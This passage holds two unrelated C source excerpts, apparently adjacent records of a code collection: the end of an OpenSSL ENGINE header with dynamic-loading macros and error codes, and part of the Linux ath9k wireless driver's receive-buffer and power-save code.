lock_fns; } dynamic_fns; /* * The version checking function should be of this prototype. NB: The * ossl_version value passed in is the OSSL_DYNAMIC_VERSION of the loading * code. If this function returns zero, it indicates a (potential) version * incompatibility and the loaded library doesn't believe it can proceed. * Otherwise, the returned value is the (latest) version supported by the * loading library. The loader may still decide that the loaded code's * version is unsatisfactory and could veto the load. The function is * expected to be implemented with the symbol name "v_check", and a default * implementation can be fully instantiated with * IMPLEMENT_DYNAMIC_CHECK_FN(). */ typedef unsigned long (*dynamic_v_check_fn) (unsigned long ossl_version); # define IMPLEMENT_DYNAMIC_CHECK_FN() \ OPENSSL_EXPORT unsigned long v_check(unsigned long v); \ OPENSSL_EXPORT unsigned long v_check(unsigned long v) { \ if(v >= OSSL_DYNAMIC_OLDEST) return OSSL_DYNAMIC_VERSION; \ return 0; } /* * This function is passed the ENGINE structure to initialise with its own * function and command settings. It should not adjust the structural or * functional reference counts. If this function returns zero, (a) the load * will be aborted, (b) the previous ENGINE state will be memcpy'd back onto * the structure, and (c) the shared library will be unloaded. So * implementations should do their own internal cleanup in failure * circumstances otherwise they could leak. The 'id' parameter, if non-NULL, * represents the ENGINE id that the loader is looking for. If this is NULL, * the shared library can choose to return failure or to initialise a * 'default' ENGINE. If non-NULL, the shared library must initialise only an * ENGINE matching the passed 'id'. The function is expected to be * implemented with the symbol name "bind_engine". A standard implementation * can be instantiated with IMPLEMENT_DYNAMIC_BIND_FN(fn) where the parameter * 'fn' is a callback function that populates the ENGINE structure and * returns an int value (zero for failure). 'fn' should have prototype; * [static] int fn(ENGINE *e, const char *id); */ typedef int (*dynamic_bind_engine) (ENGINE *e, const char *id, const dynamic_fns *fns); # define IMPLEMENT_DYNAMIC_BIND_FN(fn) \ OPENSSL_EXPORT \ int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns); \ OPENSSL_EXPORT \ int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns) { \ if(ENGINE_get_static_state() == fns->static_state) goto skip_cbs; \ if(!CRYPTO_set_mem_functions(fns->mem_fns.malloc_cb, \ fns->mem_fns.realloc_cb, fns->mem_fns.free_cb)) \ return 0; \ CRYPTO_set_locking_callback(fns->lock_fns.lock_locking_cb); \ CRYPTO_set_add_lock_callback(fns->lock_fns.lock_add_lock_cb); \ CRYPTO_set_dynlock_create_callback(fns->lock_fns.dynlock_create_cb); \ CRYPTO_set_dynlock_lock_callback(fns->lock_fns.dynlock_lock_cb); \ CRYPTO_set_dynlock_destroy_callback(fns->lock_fns.dynlock_destroy_cb); \ if(!CRYPTO_set_ex_data_implementation(fns->ex_data_fns)) \ return 0; \ if(!ERR_set_implementation(fns->err_fns)) return 0; \ skip_cbs: \ if(!fn(e,id)) return 0; \ return 1; } /* * If the loading application (or library) and the loaded ENGINE library * share the same static data (eg. they're both dynamically linked to the * same libcrypto.so) we need a way to avoid trying to set system callbacks - * this would fail, and for the same reason that it's unnecessary to try. If * the loaded ENGINE has (or gets from through the loader) its own copy of * the libcrypto static data, we will need to set the callbacks. The easiest * way to detect this is to have a function that returns a pointer to some * static data and let the loading application and loaded ENGINE compare * their respective values. */ void *ENGINE_get_static_state(void); # if defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV) void ENGINE_setup_bsd_cryptodev(void); # endif /* BEGIN ERROR CODES */ /* * The following lines are auto generated by the script mkerr.pl. Any changes * made after this point may be overwritten when the script is next run. */ void ERR_load_ENGINE_strings(void); /* Error codes for the ENGINE functions. */ /* Function codes. */ # define ENGINE_F_DYNAMIC_CTRL 180 # define ENGINE_F_DYNAMIC_GET_DATA_CTX 181 # define ENGINE_F_DYNAMIC_LOAD 182 # define ENGINE_F_DYNAMIC_SET_DATA_CTX 183 # define ENGINE_F_ENGINE_ADD 105 # define ENGINE_F_ENGINE_BY_ID 106 # define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE 170 # define ENGINE_F_ENGINE_CTRL 142 # define ENGINE_F_ENGINE_CTRL_CMD 178 # define ENGINE_F_ENGINE_CTRL_CMD_STRING 171 # define ENGINE_F_ENGINE_FINISH 107 # define ENGINE_F_ENGINE_FREE_UTIL 108 # define ENGINE_F_ENGINE_GET_CIPHER 185 # define ENGINE_F_ENGINE_GET_DEFAULT_TYPE 177 # define ENGINE_F_ENGINE_GET_DIGEST 186 # define ENGINE_F_ENGINE_GET_NEXT 115 # define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH 193 # define ENGINE_F_ENGINE_GET_PKEY_METH 192 # define ENGINE_F_ENGINE_GET_PREV 116 # define ENGINE_F_ENGINE_INIT 119 # define ENGINE_F_ENGINE_LIST_ADD 120 # define ENGINE_F_ENGINE_LIST_REMOVE 121 # define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY 150 # define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY 151 # define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT 194 # define ENGINE_F_ENGINE_NEW 122 # define ENGINE_F_ENGINE_REMOVE 123 # define ENGINE_F_ENGINE_SET_DEFAULT_STRING 189 # define ENGINE_F_ENGINE_SET_DEFAULT_TYPE 126 # define ENGINE_F_ENGINE_SET_ID 129 # define ENGINE_F_ENGINE_SET_NAME 130 # define ENGINE_F_ENGINE_TABLE_REGISTER 184 # define ENGINE_F_ENGINE_UNLOAD_KEY 152 # define ENGINE_F_ENGINE_UNLOCKED_FINISH 191 # define ENGINE_F_ENGINE_UP_REF 190 # define ENGINE_F_INT_CTRL_HELPER 172 # define ENGINE_F_INT_ENGINE_CONFIGURE 188 # define ENGINE_F_INT_ENGINE_MODULE_INIT 187 # define ENGINE_F_LOG_MESSAGE 141 /* Reason codes. */ # define ENGINE_R_ALREADY_LOADED 100 # define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER 133 # define ENGINE_R_CMD_NOT_EXECUTABLE 134 # define ENGINE_R_COMMAND_TAKES_INPUT 135 # define ENGINE_R_COMMAND_TAKES_NO_INPUT 136 # define ENGINE_R_CONFLICTING_ENGINE_ID 103 # define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED 119 # define ENGINE_R_DH_NOT_IMPLEMENTED 139 # define ENGINE_R_DSA_NOT_IMPLEMENTED 140 # define ENGINE_R_DSO_FAILURE 104 # define ENGINE_R_DSO_NOT_FOUND 132 # define ENGINE_R_ENGINES_SECTION_ERROR 148 # define ENGINE_R_ENGINE_CONFIGURATION_ERROR 102 # define ENGINE_R_ENGINE_IS_NOT_IN_LIST 105 # define ENGINE_R_ENGINE_SECTION_ERROR 149 # define ENGINE_R_FAILED_LOADING_PRIVATE_KEY 128 # define ENGINE_R_FAILED_LOADING_PUBLIC_KEY 129 # define ENGINE_R_FINISH_FAILED 106 # define ENGINE_R_GET_HANDLE_FAILED 107 # define ENGINE_R_ID_OR_NAME_MISSING 108 # define ENGINE_R_INIT_FAILED 109 # define ENGINE_R_INTERNAL_LIST_ERROR 110 # define ENGINE_R_INVALID_ARGUMENT 143 # define ENGINE_R_INVALID_CMD_NAME 137 # define ENGINE_R_INVALID_CMD_NUMBER 138 # define ENGINE_R_INVALID_INIT_VALUE 151 # define ENGINE_R_INVALID_STRING 150 # define ENGINE_R_NOT_INITIALISED 117 # define ENGINE_R_NOT_LOADED 112 # define ENGINE_R_NO_CONTROL_FUNCTION 120 # define ENGINE_R_NO_INDEX 144 # define ENGINE_R_NO_LOAD_FUNCTION 125 # define ENGINE_R_NO_REFERENCE 130 # define ENGINE_R_NO_SUCH_ENGINE 116 # define ENGINE_R_NO_UNLOAD_FUNCTION 126 # define ENGINE_R_PROVIDE_PARAMETERS 113 # define ENGINE_R_RSA_NOT_IMPLEMENTED 141 # define ENGINE_R_UNIMPLEMENTED_CIPHER 146 # define ENGINE_R_UNIMPLEMENTED_DIGEST 147 # define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD 101 # define ENGINE_R_VERSION_INCOMPATIBILITY 145 #ifdef __cplusplus } #endif #endif
{ "language": "C" }
/* * Copyright (c) 2008-2011 Atheros Communications Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include <linux/dma-mapping.h> #include "ath9k.h" #include "ar9003_mac.h" #define SKB_CB_ATHBUF(__skb) (*((struct ath_buf **)__skb->cb)) static inline bool ath_is_alt_ant_ratio_better(int alt_ratio, int maxdelta, int mindelta, int main_rssi_avg, int alt_rssi_avg, int pkt_count) { return (((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) && (alt_rssi_avg > main_rssi_avg + maxdelta)) || (alt_rssi_avg > main_rssi_avg + mindelta)) && (pkt_count > 50); } static inline bool ath_ant_div_comb_alt_check(u8 div_group, int alt_ratio, int curr_main_set, int curr_alt_set, int alt_rssi_avg, int main_rssi_avg) { bool result = false; switch (div_group) { case 0: if (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO) result = true; break; case 1: case 2: if ((((curr_main_set == ATH_ANT_DIV_COMB_LNA2) && (curr_alt_set == ATH_ANT_DIV_COMB_LNA1) && (alt_rssi_avg >= (main_rssi_avg - 5))) || ((curr_main_set == ATH_ANT_DIV_COMB_LNA1) && (curr_alt_set == ATH_ANT_DIV_COMB_LNA2) && (alt_rssi_avg >= (main_rssi_avg - 2)))) && (alt_rssi_avg >= 4)) result = true; else result = false; break; } return result; } static inline bool ath9k_check_auto_sleep(struct ath_softc *sc) { return sc->ps_enabled && (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_AUTOSLEEP); } /* * Setup and link descriptors. * * 11N: we can no longer afford to self link the last descriptor. * MAC acknowledges BA status as long as it copies frames to host * buffer (or rx fifo). This can incorrectly acknowledge packets * to a sender if last desc is self-linked. */ static void ath_rx_buf_link(struct ath_softc *sc, struct ath_buf *bf) { struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct ath_desc *ds; struct sk_buff *skb; ATH_RXBUF_RESET(bf); ds = bf->bf_desc; ds->ds_link = 0; /* link to null */ ds->ds_data = bf->bf_buf_addr; /* virtual addr of the beginning of the buffer. */ skb = bf->bf_mpdu; BUG_ON(skb == NULL); ds->ds_vdata = skb->data; /* * setup rx descriptors. The rx_bufsize here tells the hardware * how much data it can DMA to us and that we are prepared * to process */ ath9k_hw_setuprxdesc(ah, ds, common->rx_bufsize, 0); if (sc->rx.rxlink == NULL) ath9k_hw_putrxbuf(ah, bf->bf_daddr); else *sc->rx.rxlink = bf->bf_daddr; sc->rx.rxlink = &ds->ds_link; } static void ath_setdefantenna(struct ath_softc *sc, u32 antenna) { /* XXX block beacon interrupts */ ath9k_hw_setantenna(sc->sc_ah, antenna); sc->rx.defant = antenna; sc->rx.rxotherant = 0; } static void ath_opmode_init(struct ath_softc *sc) { struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); u32 rfilt, mfilt[2]; /* configure rx filter */ rfilt = ath_calcrxfilter(sc); ath9k_hw_setrxfilter(ah, rfilt); /* configure bssid mask */ ath_hw_setbssidmask(common); /* configure operational mode */ ath9k_hw_setopmode(ah); /* calculate and install multicast filter */ mfilt[0] = mfilt[1] = ~0; ath9k_hw_setmcastfilter(ah, mfilt[0], mfilt[1]); } static bool ath_rx_edma_buf_link(struct ath_softc *sc, enum ath9k_rx_qtype qtype) { struct ath_hw *ah = sc->sc_ah; struct ath_rx_edma *rx_edma; struct sk_buff *skb; struct ath_buf *bf; rx_edma = &sc->rx.rx_edma[qtype]; if (skb_queue_len(&rx_edma->rx_fifo) >= rx_edma->rx_fifo_hwsize) return false; bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list); list_del_init(&bf->list); skb = bf->bf_mpdu; ATH_RXBUF_RESET(bf); memset(skb->data, 0, ah->caps.rx_status_len); dma_sync_single_for_device(sc->dev, bf->bf_buf_addr, ah->caps.rx_status_len, DMA_TO_DEVICE); SKB_CB_ATHBUF(skb) = bf; ath9k_hw_addrxbuf_edma(ah, bf->bf_buf_addr, qtype); skb_queue_tail(&rx_edma->rx_fifo, skb); return true; } static void ath_rx_addbuffer_edma(struct ath_softc *sc, enum ath9k_rx_qtype qtype, int size) { struct ath_common *common = ath9k_hw_common(sc->sc_ah); struct ath_buf *bf, *tbf; if (list_empty(&sc->rx.rxbuf)) { ath_dbg(common, QUEUE, "No free rx buf available\n"); return; } list_for_each_entry_safe(bf, tbf, &sc->rx.rxbuf, list) if (!ath_rx_edma_buf_link(sc, qtype)) break; } static void ath_rx_remove_buffer(struct ath_softc *sc, enum ath9k_rx_qtype qtype) { struct ath_buf *bf; struct ath_rx_edma *rx_edma; struct sk_buff *skb; rx_edma = &sc->rx.rx_edma[qtype]; while ((skb = skb_dequeue(&rx_edma->rx_fifo)) != NULL) { bf = SKB_CB_ATHBUF(skb); BUG_ON(!bf); list_add_tail(&bf->list, &sc->rx.rxbuf); } } static void ath_rx_edma_cleanup(struct ath_softc *sc) { struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct ath_buf *bf; ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_LP); ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_HP); list_for_each_entry(bf, &sc->rx.rxbuf, list) { if (bf->bf_mpdu) { dma_unmap_single(sc->dev, bf->bf_buf_addr, common->rx_bufsize, DMA_BIDIRECTIONAL); dev_kfree_skb_any(bf->bf_mpdu); bf->bf_buf_addr = 0; bf->bf_mpdu = NULL; } } INIT_LIST_HEAD(&sc->rx.rxbuf); kfree(sc->rx.rx_bufptr); sc->rx.rx_bufptr = NULL; } static void ath_rx_edma_init_queue(struct ath_rx_edma *rx_edma, int size) { skb_queue_head_init(&rx_edma->rx_fifo); rx_edma->rx_fifo_hwsize = size; } static int ath_rx_edma_init(struct ath_softc *sc, int nbufs) { struct ath_common *common = ath9k_hw_common(sc->sc_ah); struct ath_hw *ah = sc->sc_ah; struct sk_buff *skb; struct ath_buf *bf; int error = 0, i; u32 size; ath9k_hw_set_rx_bufsize(ah, common->rx_bufsize - ah->caps.rx_status_len); ath_rx_edma_init_queue(&sc->rx.rx_edma[ATH9K_RX_QUEUE_LP], ah->caps.rx_lp_qdepth); ath_rx_edma_init_queue(&sc->rx.rx_edma[ATH9K_RX_QUEUE_HP], ah->caps.rx_hp_qdepth); size = sizeof(struct ath_buf) * nbufs; bf = kzalloc(size, GFP_KERNEL); if (!bf) return -ENOMEM; INIT_LIST_HEAD(&sc->rx.rxbuf); sc->rx.rx_bufptr = bf; for (i = 0; i < nbufs; i++, bf++) { skb = ath_rxbuf_alloc(common, common->rx_bufsize, GFP_KERNEL); if (!skb) { error = -ENOMEM; goto rx_init_fail; } memset(skb->data, 0, common->rx_bufsize); bf->bf_mpdu = skb; bf->bf_buf_addr = dma_map_single(sc->dev, skb->data, common->rx_bufsize, DMA_BIDIRECTIONAL); if (unlikely(dma_mapping_error(sc->dev, bf->bf_buf_addr))) { dev_kfree_skb_any(skb); bf->bf_mpdu = NULL; bf->bf_buf_addr = 0; ath_err(common, "dma_mapping_error() on RX init\n"); error = -ENOMEM; goto rx_init_fail; } list_add_tail(&bf->list, &sc->rx.rxbuf); } return 0; rx_init_fail: ath_rx_edma_cleanup(sc); return error; } static void ath_edma_start_recv(struct ath_softc *sc) { spin_lock_bh(&sc->rx.rxbuflock); ath9k_hw_rxena(sc->sc_ah); ath_rx_addbuffer_edma(sc, ATH9K_RX_QUEUE_HP, sc->rx.rx_edma[ATH9K_RX_QUEUE_HP].rx_fifo_hwsize); ath_rx_addbuffer_edma(sc, ATH9K_RX_QUEUE_LP, sc->rx.rx_edma[ATH9K_RX_QUEUE_LP].rx_fifo_hwsize); ath_opmode_init(sc); ath9k_hw_startpcureceive(sc->sc_ah, (sc->sc_flags & SC_OP_OFFCHANNEL)); spin_unlock_bh(&sc->rx.rxbuflock); } static void ath_edma_stop_recv(struct ath_softc *sc) { ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_HP); ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_LP); } int ath_rx_init(struct ath_softc *sc, int nbufs) { struct ath_common *common = ath9k_hw_common(sc->sc_ah); struct sk_buff *skb; struct ath_buf *bf; int error = 0; spin_lock_init(&sc->sc_pcu_lock); sc->sc_flags &= ~SC_OP_RXFLUSH; spin_lock_init(&sc->rx.rxbuflock); common->rx_bufsize = IEEE80211_MAX_MPDU_LEN / 2 + sc->sc_ah->caps.rx_status_len; if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) { return ath_rx_edma_init(sc, nbufs); } else { ath_dbg(common, CONFIG, "cachelsz %u rxbufsize %u\n", common->cachelsz, common->rx_bufsize); /* Initialize rx descriptors */ error = ath_descdma_setup(sc, &sc->rx.rxdma, &sc->rx.rxbuf, "rx", nbufs, 1, 0); if (error != 0) { ath_err(common, "failed to allocate rx descriptors: %d\n", error); goto err; } list_for_each_entry(bf, &sc->rx.rxbuf, list) { skb = ath_rxbuf_alloc(common, common->rx_bufsize, GFP_KERNEL); if (skb == NULL) { error = -ENOMEM; goto err; } bf->bf_mpdu = skb; bf->bf_buf_addr = dma_map_single(sc->dev, skb->data, common->rx_bufsize, DMA_FROM_DEVICE); if (unlikely(dma_mapping_error(sc->dev, bf->bf_buf_addr))) { dev_kfree_skb_any(skb); bf->bf_mpdu = NULL; bf->bf_buf_addr = 0; ath_err(common, "dma_mapping_error() on RX init\n"); error = -ENOMEM; goto err; } } sc->rx.rxlink = NULL; } err: if (error) ath_rx_cleanup(sc); return error; } void ath_rx_cleanup(struct ath_softc *sc) { struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct sk_buff *skb; struct ath_buf *bf; if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) { ath_rx_edma_cleanup(sc); return; } else { list_for_each_entry(bf, &sc->rx.rxbuf, list) { skb = bf->bf_mpdu; if (skb) { dma_unmap_single(sc->dev, bf->bf_buf_addr, common->rx_bufsize, DMA_FROM_DEVICE); dev_kfree_skb(skb); bf->bf_buf_addr = 0; bf->bf_mpdu = NULL; } } if (sc->rx.rxdma.dd_desc_len != 0) ath_descdma_cleanup(sc, &sc->rx.rxdma, &sc->rx.rxbuf); } } /* * Calculate the receive filter according to the * operating mode and state: * * o always accept unicast, broadcast, and multicast traffic * o maintain current state of phy error reception (the hal * may enable phy error frames for noise immunity work) * o probe request frames are accepted only when operating in * hostap, adhoc, or monitor modes * o enable promiscuous mode according to the interface state * o accept beacons: * - when operating in adhoc mode so the 802.11 layer creates * node table entries for peers, * - when operating in station mode for collecting rssi data when * the station is otherwise quiet, or * - when operating as a repeater so we see repeater-sta beacons * - when scanning */ u32 ath_calcrxfilter(struct ath_softc *sc) { u32 rfilt; rfilt = ATH9K_RX_FILTER_UCAST | ATH9K_RX_FILTER_BCAST | ATH9K_RX_FILTER_MCAST; if (sc->rx.rxfilter & FIF_PROBE_REQ) rfilt |= ATH9K_RX_FILTER_PROBEREQ; /* * Set promiscuous mode when FIF_PROMISC_IN_BSS is enabled for station * mode interface or when in monitor mode. AP mode does not need this * since it receives all in-BSS frames anyway. */ if (sc->sc_ah->is_monitoring) rfilt |= ATH9K_RX_FILTER_PROM; if (sc->rx.rxfilter & FIF_CONTROL) rfilt |= ATH9K_RX_FILTER_CONTROL; if ((sc->sc_ah->opmode == NL80211_IFTYPE_STATION) && (sc->nvifs <= 1) && !(sc->rx.rxfilter & FIF_BCN_PRBRESP_PROMISC)) rfilt |= ATH9K_RX_FILTER_MYBEACON; else rfilt |= ATH9K_RX_FILTER_BEACON; if ((sc->sc_ah->opmode == NL80211_IFTYPE_AP) || (sc->rx.rxfilter & FIF_PSPOLL)) rfilt |= ATH9K_RX_FILTER_PSPOLL; if (conf_is_ht(&sc->hw->conf)) rfilt |= ATH9K_RX_FILTER_COMP_BAR; if (sc->nvifs > 1 || (sc->rx.rxfilter & FIF_OTHER_BSS)) { /* The following may also be needed for other older chips */ if (sc->sc_ah->hw_version.macVersion == AR_SREV_VERSION_9160) rfilt |= ATH9K_RX_FILTER_PROM; rfilt |= ATH9K_RX_FILTER_MCAST_BCAST_ALL; } return rfilt; } int ath_startrecv(struct ath_softc *sc) { struct ath_hw *ah = sc->sc_ah; struct ath_buf *bf, *tbf; if (ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) { ath_edma_start_recv(sc); return 0; } spin_lock_bh(&sc->rx.rxbuflock); if (list_empty(&sc->rx.rxbuf)) goto start_recv; sc->rx.rxlink = NULL; list_for_each_entry_safe(bf, tbf, &sc->rx.rxbuf, list) { ath_rx_buf_link(sc, bf); } /* We could have deleted elements so the list may be empty now */ if (list_empty(&sc->rx.rxbuf)) goto start_recv; bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list); ath9k_hw_putrxbuf(ah, bf->bf_daddr); ath9k_hw_rxena(ah); start_recv: ath_opmode_init(sc); ath9k_hw_startpcureceive(ah, (sc->sc_flags & SC_OP_OFFCHANNEL)); spin_unlock_bh(&sc->rx.rxbuflock); return 0; } bool ath_stoprecv(struct ath_softc *sc) { struct ath_hw *ah = sc->sc_ah; bool stopped, reset = false; spin_lock_bh(&sc->rx.rxbuflock); ath9k_hw_abortpcurecv(ah); ath9k_hw_setrxfilter(ah, 0); stopped = ath9k_hw_stopdmarecv(ah, &reset); if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) ath_edma_stop_recv(sc); else sc->rx.rxlink = NULL; spin_unlock_bh(&sc->rx.rxbuflock); if (!(ah->ah_flags & AH_UNPLUGGED) && unlikely(!stopped)) { ath_err(ath9k_hw_common(sc->sc_ah), "Could not stop RX, we could be " "confusing the DMA engine when we start RX up\n"); ATH_DBG_WARN_ON_ONCE(!stopped); } return stopped && !reset; } void ath_flushrecv(struct ath_softc *sc) { sc->sc_flags |= SC_OP_RXFLUSH; if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) ath_rx_tasklet(sc, 1, true); ath_rx_tasklet(sc, 1, false); sc->sc_flags &= ~SC_OP_RXFLUSH; } static bool ath_beacon_dtim_pending_cab(struct sk_buff *skb) { /* Check whether the Beacon frame has DTIM indicating buffered bc/mc */ struct ieee80211_mgmt *mgmt; u8 *pos, *end, id, elen; struct ieee80211_tim_ie *tim; mgmt = (struct ieee80211_mgmt *)skb->data; pos = mgmt->u.beacon.variable; end = skb->data + skb->len; while (pos + 2 < end) { id = *pos++; elen = *pos++; if (pos + elen > end) break; if (id == WLAN_EID_TIM) { if (elen < sizeof(*tim)) break; tim = (struct ieee80211_tim_ie *) pos; if (tim->dtim_count != 0) break; return tim->bitmap_ctrl & 0x01; } pos += elen; } return false; } static void ath_rx_ps_beacon(struct ath_softc *sc, struct sk_buff *skb) { struct ath_common *common = ath9k_hw_common(sc->sc_ah); if (skb->len < 24 + 8 + 2 + 2) return; sc->ps_flags &= ~PS_WAIT_FOR_BEACON; if (sc->ps_flags & PS_BEACON_SYNC) { sc->ps_flags &= ~PS_BEACON_SYNC; ath_dbg(common, PS, "Reconfigure Beacon timers based on timestamp from the AP\n"); ath_set_beacon(sc); } if (ath_beacon_dtim_pending_cab(skb)) { /* * Remain awake waiting for buffered broadcast/multicast * frames. If the last broadcast/multicast frame is not * received properly, the next beacon frame will work as * a backup trigger for returning into NETWORK SLEEP state, * so we are waiting for it as well. */ ath_dbg(common, PS, "Received DTIM beacon indicating buffered broadcast/multicast frame(s)\n"); sc->ps_flags |= PS_WAIT_FOR_CAB | PS_WAIT_FOR_BEACON; return; } if (sc->ps_flags & PS_WAIT_FOR_CAB) { /* * This can happen if a broadcast frame is dropped or the AP * fails to send a frame indicating that all CAB frames have * been delivered. */ sc->ps_flags &= ~PS_WAIT_FOR_CAB; ath_dbg(common, PS, "PS wait for CAB frames timed out\n"); } } static void ath_rx_ps(struct ath_softc *sc, struct sk_buff *skb, bool mybeacon) { struct ieee80211_hdr *hdr; struct ath_common *common = ath9k_hw_common(sc->sc_ah); hdr = (struct ieee80211_hdr *)skb->data; /* Process Beacon and CAB receive in PS state */ if (((sc->ps_flags & PS_WAIT_FOR_BEACON) || ath9k_check_auto_sleep(sc)) && mybeacon) ath_rx_ps_beacon(sc, skb); else if ((sc->ps_flags & PS_WAIT_FOR_CAB) && (ieee80211_is_data(hdr->frame_control) || ieee80211_is_action(hdr->frame_control)) && is_multicast_ether_addr(hdr->addr1) && !ieee80211_has_moredata(hdr->frame_control)) { /* * No more broadcast/multicast frames to be received at this * point. */ sc->ps_flags &= ~(PS_WAIT_FOR_CAB | PS_WAIT_FOR_BEACON); ath_dbg(common, PS, "All PS CAB frames received, back to sleep\n"); } else if ((sc->ps_flags & PS_WAIT_FOR_PSPOLL_DATA) && !is_multicast_ether_addr(hdr->addr1) && !ieee80211_has_morefrags(hdr->frame_control)) { sc->ps_flags &= ~PS_WAIT_FOR_PSPOLL_DATA; ath_dbg(common, PS, "Going back to sleep after having received PS-Poll data (0x%lx)\n", sc->ps_flags & (PS_WAIT_FOR_BEACON | PS_WAIT_FOR_CAB | PS_WAIT_FOR_PSPOLL_DATA | PS_WAIT_FOR_TX_ACK)); } } static bool ath_edma_get_buffers(struct ath_softc *sc, enum ath9k_rx_qtype qtype, struct ath_rx_status *rs, struct ath_buf **dest) { struct ath_rx_edma *rx_edma = &sc->rx.rx_edma[qtype]; struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct sk_buff *skb; struct ath_buf *bf; int ret; skb = skb_peek(&rx_edma->rx_fifo); if (!skb) return false; bf = SKB_CB_ATHBUF(skb); BUG_ON(!bf); dma_sync_single_for_cpu(sc->dev, bf->bf_buf_addr, common->rx_bufsize, DMA_FROM_DEVICE); ret = ath9k_hw_process_rxdesc_edma(ah, rs, skb->data); if (ret == -EINPROGRESS) { /*let device gain the buffer again*/ dma_sync_single_for_device(sc->dev, bf->bf_buf_addr, common->rx_bufsize, DMA_FROM_DEVICE); return false; } __skb_unlink(skb, &rx_edma->rx_fifo); if (ret == -EINVAL) { /* corrupt descriptor, skip this one and the following one */ list_add_tail(&bf->list, &sc->rx.rxbuf); ath_rx_edma_buf_link(sc, qtype); skb = skb_peek(&rx_edma->rx_fifo); if (skb) { bf = SKB_CB_ATHBUF(skb); BUG_ON(!bf); __skb_unlink(skb, &rx_edma->rx_fifo); list_add_tail(&bf->list, &sc->rx.rxbuf); ath_rx_edma_buf_link(sc, qtype); } else { bf = NULL; } } *dest = bf; return true; } static struct ath_buf *ath_edma_get_next_rx_buf(struct ath_softc *sc, struct ath_rx_status *rs, enum ath9k_rx_qtype qtype) { struct ath_buf *bf = NULL; while (ath_edma_get_buffers(sc, qtype, rs, &bf)) { if (!bf) continue; return bf; } return NULL; } static struct ath_buf *ath_get_next_rx_buf(struct ath_softc *sc, struct ath_rx_status *rs) { struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct ath_desc *ds; struct ath_buf *bf; int ret; if (list_empty(&sc->rx.rxbuf)) { sc->rx.rxlink = NULL; return NULL; } bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list); ds = bf->bf_desc; /* * Must provide the virtual address of the current * descriptor, the physical address, and the virtual * address of the next descriptor in the h/w chain. * This allows the HAL to look ahead to see if the * hardware is done with a descriptor by checking the * done bit in the following descriptor and the address * of the current descriptor the DMA engine is working * on. All this is necessary because of our use of * a self-linked list to avoid rx overruns. */ ret = ath9k_hw_rxprocdesc(ah, ds, rs); if (ret == -EINPROGRESS) { struct ath_rx_status trs; struct ath_buf *tbf; struct ath_desc *tds; memset(&trs, 0, sizeof(trs)); if (list_is_last(&bf->list, &sc->rx.rxbuf)) { sc->rx.rxlink = NULL; return NULL; } tbf = list_entry(bf->list.next, struct ath_buf, list); /* * On some hardware the descriptor status words could * get corrupted, including the done bit. Because of * this, check if the next descriptor's done bit is * set or not. * * If the next descriptor's done bit is set, the current * descriptor has been corrupted. Force s/w to discard * this descriptor and continue... */ tds = tbf->bf_desc; ret = ath9k_hw_rxprocdesc(ah, tds, &trs); if (ret == -EINPROGRESS) return NULL; } if (!bf->bf_mpdu) return bf; /* * Synchronize the DMA transfer with CPU before * 1. accessing the frame * 2. requeueing the same buffer to h/w */ dma_sync_single_for_cpu(sc->dev, bf->bf_buf_addr, common->rx_bufsize, DMA_FROM_DEVICE); return bf; } /* Assumes you've already done the endian to CPU conversion */ static bool ath9k_rx_accept(struct ath_common *common, struct ieee80211_hdr *hdr, struct ieee80211_rx_status *rxs, struct ath_rx_status *rx_stats, bool *decrypt_error) { struct ath_softc *sc = (struct ath_softc *) common->priv; bool is_mc, is_valid_tkip, strip_mic, mic_error; struct ath_hw *ah = common->ah; __le16 fc; u8 rx_status_len = ah->caps.rx_status_len; fc = hdr->frame_control; is_mc = !!is_multicast_ether_addr(hdr->addr1); is_valid_tkip = rx_stats->rs_keyix != ATH9K_RXKEYIX_INVALID && test_bit(rx_stats->rs_keyix, common->tkip_keymap); strip_mic = is_valid_tkip && ieee80211_is_data(fc) 